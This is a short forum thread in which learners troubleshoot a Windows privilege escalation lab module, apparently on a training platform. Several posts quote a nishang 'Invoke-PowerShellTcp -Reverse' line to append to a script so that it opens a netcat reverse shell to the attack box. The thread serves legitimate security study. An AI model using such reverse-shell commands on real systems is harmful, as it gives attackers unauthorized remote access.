If anyone has done the windows privilege Escalation Module.
Im on “Attacking the OS” “vulnerable services” section and could use some help.
This section shouldn’t be too hard as you are supposed to just copy the example that the lesson gives you.
But after seemingly following the example to the letter the exploit is not working. I am not getting the netcat shell.
Only thing I can think of right now is that I may not be appending the
<Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.3 -Port 9443>
correctly. to the shell.ps1 script. Ive tried pasting this in many different places in the script of course replacing the I.P with my attack box I.P address. I never get the netcat shell.
ok some reason my own parrot virtual machine was unable to get the netcat shell listener.
Using the pwn box I was able to get the shell. Possible some network or firewall setting on my own set up may have prevented it.
Ok I noticed on that bottom terminal is says listening on 0.0.0.0. Looks odd. Should be listening on your tun0 I.P address of your attack machine.
It was not a clear section.
I managed to get a reverse shell by appending “Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.172 -Port 9443” to nishang/Shells/Invoke-PowerShellTcp.ps1 at master · samratashok/nishang · GitHub.
However, there was no privilege escalation with this shell (I stayed as user htb-student).
I got the flag using this link Windows Privilege Escalation. This room covers fundamental techniques… | by YCZHU | Medium.